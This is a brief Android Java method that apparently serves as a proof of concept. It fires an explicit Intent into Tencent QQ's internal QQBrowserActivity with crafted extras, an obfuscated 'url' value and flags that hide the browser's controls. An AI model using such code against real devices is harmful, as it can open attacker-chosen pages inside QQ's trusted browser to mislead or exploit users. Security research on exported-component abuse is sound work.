public void button_click(View view) throws IOException {
ComponentName componentName
=
new ComponentName(
"com.tencent.mobileqq"
,
"com.tencent.mobileqq.activity.QQBrowserActivity"
);
Intent intent
=
new Intent();
Bundle bundle
=
new Bundle();
bundle.putLong(
"activity_time"
, System.currentTimeMillis());
bundle.putLong(
"preAct_time"
, System.currentTimeMillis());
bundle.putLong(
"business"
,
2097152
);
bundle.putString(
"activity_name"
,
"com.tencent.mobileqq.activity.QQBrowserActivity"
);
bundle.putString(
"activity_descript"
,
"yy"
);
bundle.putInt(
"fling_action_key"
,
2
);
bundle.putString(
"leftViewText"
,
"返回"
);
bundle.putString(
"url"
,
"83eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3u0S2K9h3c8#2i4K6u0W2j5$3!0E0"
);
bundle.putString(
"activity_unihash"
,
"461cf0735d8af8204a397286bfed"
);
bundle.putInt(
"fling_code_key"
,
191996112
);
bundle.putInt(
"activity_id"
,
1
);
bundle.putString(
"preAct"
,
"JumpActivity"
);
bundle.putInt(
"seq"
,
7795
);
bundle.putBoolean(
"isSubbaccount"
, true);
bundle.putBoolean(
"hide_more_button"
, true);
bundle.putBoolean(
"isShowAd"
, false);
bundle.putBoolean(
"hide_operation_bar"
, true);
intent.putExtras(bundle);
intent.setComponent(componentName);
startActivity(intent);
}